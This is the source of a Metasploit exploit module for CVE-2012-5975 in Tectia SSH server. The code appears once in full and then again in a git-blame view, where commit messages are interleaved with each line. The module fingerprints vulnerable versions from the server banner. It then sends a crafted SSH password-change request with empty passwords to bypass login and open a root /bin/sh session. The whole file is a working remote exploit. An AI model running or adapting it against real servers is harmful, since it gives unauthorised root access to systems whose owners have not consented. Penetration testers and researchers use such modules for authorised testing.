metasploit-framework/modules/exploits/unix/ssh/tectia_passwd_changereq.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability in Tectia SSH server for Unix-based
				platforms.  The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request
				before password authentication, allowing any remote user to bypass the login
				routine, and then gain access as root.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'kingcope',  #Original 0day
					'bperry',
					'sinn3r'
				],
			'References'     =>
				[
					['CVE', '2012-5975'],
					['EDB', '23082'],
					['OSVDB', '88103'],
					['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12'],
					['URL', 'http://www.ssh.com/index.php/component/content/article/531.html']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Unix-based Tectia SSH 6.3 or prior', {}]
				],
			'Privileged'     => true,
			'DisclosureDate' => "Dec 01 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(22),
				OptString.new('USERNAME', [true, 'The username to login as', 'root'])
			], self.class
		)

		register_advanced_options(
			[
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end

	def check
		connect
		banner = sock.get_once.strip
		print_status("#{rhost}:#{rport} - Banner: #{banner}")
		disconnect

		# Vulnerable version info obtained from CVE
		version = banner.scan(/\-(\d\.\d\.\d*).+SSH Tectia/).flatten[0] || ''
		build   = version.split('.')[-1].to_i

		case version
		when /^6\.0/
			unless (4..14).include?(build) or (17..20).include?(build)
				return Exploit::CheckCode::Safe
			end

		when /^6\.1/
			unless (0..9).include?(build) or build == 12
				return Exploit::CheckCode::Safe
			end

		when /^6\.2/
			unless (0..5).include?(build)
				return Exploit::CheckCode::Safe
			end

		when /^6\.3/
			unless (0..2).include?(build)
				return Exploit::CheckCode::Safe
			end
		else
			return Exploit::CheckCode::Safe
		end

		# The vulnerable version must use PASSWORD method
		user = Rex::Text.rand_text_alpha(4)
		transport, connection = init_ssh(user)
		return Exploit::CheckCode::Vulnerable if is_passwd_method?(user, transport)

		return Exploit::CheckCode::Safe
	end

	def rhost
		datastore['RHOST']
	end

	def rport
		datastore['RPORT']
	end

	def is_passwd_method?(user, transport)
		# A normal client is expected to send a ssh-userauth packet.
		# Without it, the module can hang against non-vulnerable SSH servers.
		transport.send_message(transport.service_request("ssh-userauth"))
		message = transport.next_message

		# 6 means SERVICE_ACCEPT
		if message.type != 6
			print_error("Unexpected message: #{message.inspect}")
			return false
		end

		# We send this packet as an attempt to see what auth methods are available.
		# The only auth method we want is PASSWORD.
		pkt = Net::SSH::Buffer.from(
			:byte, 0x32,               #userauth request
			:string, user,             #username
			:string, "ssh-connection", #service
			:string, "password"        #method name
		)
		pkt.write_bool(true)
		pkt.write_string("")           #Old pass
		pkt.write_string("")           #New pass

		transport.send_message(pkt)
		message = transport.next_message

		# Type 51 means the server is trying to tell us what auth methods are allowed.
		if message.type == 51 and message.to_s !~ /password/
			print_error("#{rhost}:#{rport} - This host does not use password method authentication")
			return false
		end

		return true
	end

	#
	# The following link is useful to understand how to craft the USERAUTH password change
	# request packet:
	# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
	#
	def userauth_passwd_change(user, transport, connection)
		print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
		pkt = Net::SSH::Buffer.from(
			:byte, 0x32,               #userauth request
			:string, user,             #username
			:string, "ssh-connection", #service
			:string, "password"        #method name
		)
		pkt.write_bool(true)
		pkt.write_string("")           #Old pass
		pkt.write_string("")           #New pass

		transport.send_message(pkt)
		message = transport.next_message.type
		print_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		if message.to_i == 52 #SSH2_MSG_USERAUTH_SUCCESS
			transport.send_message(transport.service_request("ssh-userauth"))
			message = transport.next_message.type

			if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
				shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
				connection = nil
				return shell
			end
		end
	end

	def init_ssh(user)
		opts       = {:user=>user, :record_auth_info=>true, :port=>rport}
		options    = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)
		transport  = Net::SSH::Transport::Session.new(rhost, options)
		connection = Net::SSH::Connection::Session.new(transport, options)

		return transport, connection
	end

	def do_login(user)
		transport, connection = init_ssh(user)
		passwd = is_passwd_method?(user, transport)

		if passwd
			conn = userauth_passwd_change(user, transport, connection)
			return conn
		end
	end

	def exploit
		c = nil

		begin
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				c = do_login(datastore['USERNAME'])
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		end

		handler(c.lsock) if c
	end
end
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`
			`require 'net/ssh'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",`
			`'Description' => %q{`
			`This module exploits a vulnerability in Tectia SSH server for Unix-based`
			`platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request`
must be password authentication 2012-12-04 15:56:51 +00:00			`before password authentication, allowing any remote user to bypass the login`
			`routine, and then gain access as root.`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'kingcope', #Original 0day`
			`'bperry',`
			`'sinn3r'`
			`],`
			`'References' =>`
			`[`
Added CVE & vendor advisory information 2012-12-05 16:13:44 +00:00			`['CVE', '2012-5975'],`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`['EDB', '23082'],`
Update references 2012-12-10 17:42:21 +00:00			`['OSVDB', '88103'],`
Added CVE & vendor advisory information 2012-12-05 16:13:44 +00:00			`['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12'],`
			`['URL', 'http://www.ssh.com/index.php/component/content/article/531.html']`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`],`
			`'Payload' =>`
			`{`
Since we have included Tcp for check(), we don't need to reg rhost 2012-12-04 15:25:24 +00:00			`'Compat' =>`
			`{`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`'PayloadType' => 'cmd_interact',`
			`'ConnectionType' => 'find'`
			`}`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
Hmm, I should change the target name 2012-12-06 03:38:31 +00:00			`['Unix-based Tectia SSH 6.3 or prior', {}]`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => "Dec 01 2012",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(22),`
			`OptString.new('USERNAME', [true, 'The username to login as', 'root'])`
			`], self.class`
			`)`

			`register_advanced_options(`
			`[`
			`OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])`
			`]`
			`)`
			`end`

			`def check`
			`connect`
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`banner = sock.get_once.strip`
			`print_status("#{rhost}:#{rport} - Banner: #{banner}")`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`disconnect`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`# Vulnerable version info obtained from CVE`
			`version = banner.scan(/\-(\d\.\d\.\d*).+SSH Tectia/).flatten[0] \|\| ''`
			`build = version.split('.')[-1].to_i`

			`case version`
			`when /^6\.0/`
			`unless (4..14).include?(build) or (17..20).include?(build)`
			`return Exploit::CheckCode::Safe`
			`end`

			`when /^6\.1/`
			`unless (0..9).include?(build) or build == 12`
			`return Exploit::CheckCode::Safe`
			`end`

			`when /^6\.2/`
			`unless (0..5).include?(build)`
			`return Exploit::CheckCode::Safe`
			`end`

			`when /^6\.3/`
			`unless (0..2).include?(build)`
			`return Exploit::CheckCode::Safe`
			`end`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`

			`# The vulnerable version must use PASSWORD method`
			`user = Rex::Text.rand_text_alpha(4)`
			`transport, connection = init_ssh(user)`
			`return Exploit::CheckCode::Vulnerable if is_passwd_method?(user, transport)`

Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`return Exploit::CheckCode::Safe`
			`end`

			`def rhost`
			`datastore['RHOST']`
			`end`

			`def rport`
			`datastore['RPORT']`
			`end`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`def is_passwd_method?(user, transport)`
			`# A normal client is expected to send a ssh-userauth packet.`
			`# Without it, the module can hang against non-vulnerable SSH servers.`
			`transport.send_message(transport.service_request("ssh-userauth"))`
			`message = transport.next_message`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`# 6 means SERVICE_ACCEPT`
			`if message.type != 6`
			`print_error("Unexpected message: #{message.inspect}")`
			`return false`
			`end`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`# We send this packet as an attempt to see what auth methods are available.`
			`# The only auth method we want is PASSWORD.`
			`pkt = Net::SSH::Buffer.from(`
			`:byte, 0x32, #userauth request`
			`:string, user, #username`
			`:string, "ssh-connection", #service`
			`:string, "password" #method name`
			`)`
			`pkt.write_bool(true)`
			`pkt.write_string("") #Old pass`
			`pkt.write_string("") #New pass`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`transport.send_message(pkt)`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`message = transport.next_message`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`# Type 51 means the server is trying to tell us what auth methods are allowed.`
If message becomes nil, we should force a to_s for the regex next_message can be nil sometimes if packet is nil (see net/ssh's poll_message source) 2012-12-06 16:44:16 +00:00			`if message.type == 51 and message.to_s !~ /password/`
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`print_error("#{rhost}:#{rport} - This host does not use password method authentication")`
			`return false`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`end`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`return true`
			`end`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
			`#`
			`# The following link is useful to understand how to craft the USERAUTH password change`
			`# request packet:`
			`# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903`
			`#`
			`def userauth_passwd_change(user, transport, connection)`
			`print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")`
			`pkt = Net::SSH::Buffer.from(`
			`:byte, 0x32, #userauth request`
			`:string, user, #username`
			`:string, "ssh-connection", #service`
			`:string, "password" #method name`
			`)`
			`pkt.write_bool(true)`
			`pkt.write_string("") #Old pass`
			`pkt.write_string("") #New pass`

			`transport.send_message(pkt)`
			`message = transport.next_message.type`
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`print_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
			`if message.to_i == 52 #SSH2_MSG_USERAUTH_SUCCESS`
			`transport.send_message(transport.service_request("ssh-userauth"))`
			`message = transport.next_message.type`

			`if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT`
			`shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)`
			`connection = nil`
			`return shell`
			`end`
			`end`
			`end`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`def init_ssh(user)`
Apply evil-e's fix when port isn't 22 See #1130 2012-12-06 03:42:53 +00:00			`opts = {:user=>user, :record_auth_info=>true, :port=>rport}`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`options = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)`
			`transport = Net::SSH::Transport::Session.new(rhost, options)`
			`connection = Net::SSH::Connection::Session.new(transport, options)`
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00
			`return transport, connection`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`end`

Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`def do_login(user)`
			`transport, connection = init_ssh(user)`
			`passwd = is_passwd_method?(user, transport)`

			`if passwd`
			`conn = userauth_passwd_change(user, transport, connection)`
			`return conn`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`end`
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`end`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00
Lots of improvements Keyboard-interactive method isn't required to exploit Tectia SSH. So this update will just go straight to password method. There's also improvements for the check() method: Not only does it check the SSH version (banner), it will also check and see if the server is using password method to auth. 2012-12-06 03:34:33 +00:00			`def exploit`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`c = nil`

			`begin`
This extra space must die. 2012-12-04 03:09:07 +00:00			`::Timeout.timeout(datastore['SSH_TIMEOUT']) do`
Add kingcope's Tectia SSH 0day 2012-12-04 03:07:32 +00:00			`c = do_login(datastore['USERNAME'])`
			`end`
			`rescue Rex::ConnectionError, Rex::AddressInUse`
			`return`
			`rescue Net::SSH::Disconnect, ::EOFError`
			`print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"`
			`return`
			`rescue Net::SSH::Exception => e`
			`print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"`
			`return`
			`rescue ::Timeout::Error`
			`print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"`
			`return`
			`end`

			`handler(c.lsock) if c`
			`end`
			`end`